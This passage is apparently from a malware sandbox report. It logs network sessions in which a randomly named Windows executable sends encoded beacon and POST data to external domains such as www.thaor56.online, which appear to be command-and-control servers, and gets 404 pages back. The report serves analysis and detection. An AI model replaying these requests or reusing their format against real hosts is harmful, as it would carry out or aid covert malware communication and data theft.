                                                                      Data Ascii: prh4=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvD5v5mkGvjFaP5gYGYXRLCAqWs7Q6UwbYvgJ18V0Hvl97QaKzZoQiP4gfOyai7RzgCRY1P7sh+Ajt2r38kYXoBkliqwm0LWv2Wd449XtjRNGzwMqJnHxPbA/wg6p+CImjezwJk+PsrOX+5ytNdkDFEgGgORAsI+wkLjnh+MYfg/DG3QhwYhozOgjYjuPqVvui5tzN4eBK34lG2Z58U53SvI5LHpSHzXMsLmhbGzZ+c0toG+FR7jgRFj4RYXu7Q3UQ34M7pNmFtjArWgQ5D64WSNRCHSsKbL7yRa5RbwRBw2nWxO4yF9OtplvzcFZPGRzS3e6oh9ELQWXJkE0dwLjwEb+mFNDd7xHfHseKiE1wMtMXwcCANViiBs0i+BWQ4RdlXF8yMX5khWlUyqq+XOaYQHDkKWODQuAF2sEBkAtnDizSgvK8EChj8V1KsdfYwSc/N943Y6rOl6ImY6m+ZGmRJzLq0pblPXiNp5jcm+7uqG5s3rBnDTgt2dM9Z+JFyGU+Add+vWIzQl0oOBJQjsvuprFMxOiLzcFltsFFsy+EJTwLNYPYf6kPB+UC8rr5RcWpV4IxspnOyqAhiShWO/2AqOS5eURm4UyQeGxjCHbvB/7YDAh66N28WQw5b89W2SnVbfZEeb/UEvapB2Xvgdq2JaXahEs1NfJrSKII3hx+zM55clH2ymr+4tzP82cThpZ+Qk+w2GIWR+sdcdLo8OaFcjQ9UsC0rDbEzpoyXYVGjoh4OoI9PSHlCxHsp+nCuHmeQhGoDbyLzd0Pzw/Bif/8k/MujL//FZG7Jn0xCNEf9iiIfshLZfj5DjrbehdurfOmE2eQG/th0dd4oYRDkhP0GCyQJXhs7jKHKrcpyvfCa+FS7j7VOPGSLoazAIkxV++AMELzO1JaLAbhqFJJd7BIo7Lo3bVslLVuxNtNw2z4TeENdWmoWKHOM8UYyXqKTt4DelBdOO [TRUNCATED]
                                                                      Nov 20, 2024 09:23:31.531133890 CET1236INHTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 20 Nov 2024 08:23:31 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                      Data Ascii: 1359ZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                      Nov 20, 2024 09:23:31.531155109 CET1236INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                                      Nov 20, 2024 09:23:31.531167030 CET448INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                      Nov 20, 2024 09:23:31.531411886 CET1236INData Raw: cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4 16 5d 8e 15 aa b4 2a 46 39 49 92 3f cb 21 14 16 cd ee c8 53 da
                                                                      Data Ascii: Gfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}ZvS7YE<tz@4Q
                                                                      Nov 20, 2024 09:23:31.531425953 CET1074INData Raw: 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1 e6 58 60 63 34 db 64 91 3e a2 66 13 7d 38 e5 d3 9d d8 b6 c3 44
                                                                      Data Ascii: .Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdlbk$Fr6,eCD


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.104998466.29.132.194806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:33.481877089 CET498OUTGET /k6yn/?_VK8=7pXD8zQxGFxP&prh4=tNpa1p20+8HvGGTGCcJ0ltHXQ7hkDEI9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV6QWKx4B669tBZ47n68xm5CBB0u297w== HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:23:34.156001091 CET1236INHTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      date: Wed, 20 Nov 2024 08:23:34 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                      Data Ascii: 2784<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                      Nov 20, 2024 09:23:34.156147003 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                      Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                      Nov 20, 2024 09:23:34.156158924 CET1236INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                      Nov 20, 2024 09:23:34.156188011 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                      Nov 20, 2024 09:23:34.156207085 CET1236INData Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34
                                                                      Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
                                                                      Nov 20, 2024 09:23:34.156219959 CET1120INData Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a
                                                                      Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
                                                                      Nov 20, 2024 09:23:34.156230927 CET1236INData Raw: 4e 37 55 59 6c 4a 6d 75 73 6c 70 57 44 55 54 64 59 61 62 34 4c 32 7a 31 76 34 30 68 50 50 42 76 77 7a 71 4f 6c 75 54 76 68 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f
                                                                      Data Ascii: N7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuT
                                                                      Nov 20, 2024 09:23:34.156420946 CET1236INData Raw: 20 34 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c
                                                                      Data Ascii: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not
                                                                      Nov 20, 2024 09:23:34.156435013 CET574INData Raw: 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c
                                                                      Data Ascii: /li> </ul> </div> </div> </section> <footer> <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=log


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.1049985202.92.5.23806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:39.885498047 CET753OUTPOST /cboa/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Origin: http://www.thaor56.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.thaor56.online/cboa/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 39 33 30 71 66 4f 52 33 2f 31 32 6a 49 64 73 4a 63 39 50 64 4b 54 5a 57 46 30 62 30 70 50 67 37 45 6f 4f 30 48 6d 70 32 72 2b 46 63 58 7a 64 69 45 43 4e 7a 32 4a 69 56 67 64 4b 4d 56 57 48 41 4c 6b 72 57 57 43 55 48 30 66 37 6c 47 72 41 50 61 57 63 4e 4e 7a 48 56 51 55 7a 53 6d 46 42 35 38 59 6b 33 4b 70 41 35 51 51 63 4e 5a 45 6e 71 35 2b 6b 6b 74 57 63 4a 4d 78 44 6e 30 48 7a 6e 46 4e 62 59 74 62 6a 7a 58 4b 30 61 39 42 75 70 31 4c 4a 59 48 42 53 57 56 2f 45 2f 76 47 66 41 79 30 6f 49 55 77 57 4c 4a 37 61 77 59 78 30
                                                                      Data Ascii: prh4=XddzRFXpS5iIZ930qfOR3/12jIdsJc9PdKTZWF0b0pPg7EoO0Hmp2r+FcXzdiECNz2JiVgdKMVWHALkrWWCUH0f7lGrAPaWcNNzHVQUzSmFB58Yk3KpA5QQcNZEnq5+kktWcJMxDn0HznFNbYtbjzXK0a9Bup1LJYHBSWV/E/vGfAy0oIUwWLJ7awYx0
                                                                      Nov 20, 2024 09:23:40.821815968 CET1236INHTTP/1.1 404 Not Found
                                                                      Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      Content-Length: 1251
                                                                      Content-Type: text/html
                                                                      Date: Wed, 20 Nov 2024 08:23:40 GMT
                                                                      Pragma: no-cache
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Nov 20, 2024 09:23:40.822134972 CET234INData Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                      Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.1049986202.92.5.23806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:42.432723999 CET777OUTPOST /cboa/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Origin: http://www.thaor56.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.thaor56.online/cboa/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 63 48 30 6d 65 4f 52 2f 2f 31 78 6d 49 64 73 53 4d 39 78 64 4b 50 5a 57 41 4d 78 30 37 72 67 38 68 55 4f 37 6c 65 70 78 72 2b 46 49 48 7a 63 68 30 43 57 7a 32 45 64 56 6c 64 4b 4d 56 43 48 41 4a 38 72 58 6c 71 58 45 45 66 35 77 57 72 43 42 36 57 63 4e 4e 7a 48 56 51 41 5a 53 6d 4e 42 34 4d 49 6b 34 4c 70 66 6c 67 51 66 45 35 45 6e 75 35 2b 6f 6b 74 57 69 4a 4e 74 35 6e 32 50 7a 6e 45 39 62 62 38 62 67 6f 48 4b 75 55 64 42 2f 36 33 37 4d 58 6d 56 53 5a 56 54 63 6f 38 47 30 4f 7a 4a 76 5a 46 52 42 59 2b 6e 55 2b 65 45 65 76 49 69 43 5a 5a 62 35 2f 57 74 66 39 44 43 58 75 4d 76 70 47 51 3d 3d
                                                                      Data Ascii: prh4=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07rg8hUO7lepxr+FIHzch0CWz2EdVldKMVCHAJ8rXlqXEEf5wWrCB6WcNNzHVQAZSmNB4MIk4LpflgQfE5Enu5+oktWiJNt5n2PznE9bb8bgoHKuUdB/637MXmVSZVTco8G0OzJvZFRBY+nU+eEevIiCZZb5/Wtf9DCXuMvpGQ==
                                                                      Nov 20, 2024 09:23:43.374948978 CET1236INHTTP/1.1 404 Not Found
                                                                      Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      Content-Length: 1251
                                                                      Content-Type: text/html
                                                                      Date: Wed, 20 Nov 2024 08:23:43 GMT
                                                                      Pragma: no-cache
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Nov 20, 2024 09:23:43.375422955 CET234INData Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                      Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.1049987202.92.5.23806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:44.979999065 CET1790OUTPOST /cboa/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Origin: http://www.thaor56.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.thaor56.online/cboa/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
